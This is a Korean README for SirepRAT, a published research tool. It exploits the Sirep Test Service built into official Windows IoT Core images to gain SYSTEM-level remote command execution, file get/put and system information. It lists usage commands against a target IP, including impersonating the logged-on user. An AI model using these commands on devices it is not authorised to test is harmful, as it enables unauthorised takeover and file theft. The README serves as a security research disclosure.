
Windows IoT Core에서 SYSTEM 권한으로 원격 명령 실행 (Python2.7 및 Python3용 릴리스 제공)

SirepRAT는 대상에 실제 RAT 악성코드를 작성할 필요 없이 완전한 RAT 기능을 제공합니다.
이 방법은 Microsoft 사이트에서 제공하는 공식 이미지에 내장되어 실행 중인 Sirep Test Service를 악용하는 것입니다. 이 서비스는 IoT 장치에서 드라이버/하드웨어 테스트를 수행하기 위해 구축할 수 있는 HLK 설정의 클라이언트 부분입니다. Sirep/WPCon/TShell 프로토콜을 제공합니다.
우리는 Sirep/WPCon 프로토콜을 분석하고, 이 프로토콜이 공격자에게 원격 명령 인터페이스를 노출시키는 방법을 보여주었습니다. 여기에는 임의의 위치에 파일을 가져오거나 넣기(get/put), 시스템 정보 획득과 같은 RAT 기능이 포함됩니다.
서비스와 프로토콜에 대한 연구에서 얻은 결과를 바탕으로, 지원되는 다양한 명령을 사용하여 이를 악용할 수 있는 간단한 파이썬 도구를 만들었습니다. 우리는 이를 SirepRAT라고 명명했습니다.
Windows IoT Core 대상에 명령을 보내기 위한 쉽고 직관적인 사용자 인터페이스를 제공합니다. 공식 Microsoft 이미지가 설치된 케이블 연결 Windows IoT Core 장치에서 작동합니다.
슬라이드 및 연구 백서는 docs 폴더에 있습니다.
pip install -r requirements.txt
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
인수와 함께 현재 로그온한 사용자로 가장:
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
( as_logged_on_user 플래그 없이 실행해 보면 SYSTEM 실행 기능을 확인할 수 있습니다)
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"
python SirepRAT.py --help
Dor Azouri (@bemikre)
movatica (@movatica) - 파이썬 3로 포팅! (2020년 마감 직전에)
BSD 3 - "New" 또는 "Revised" 조항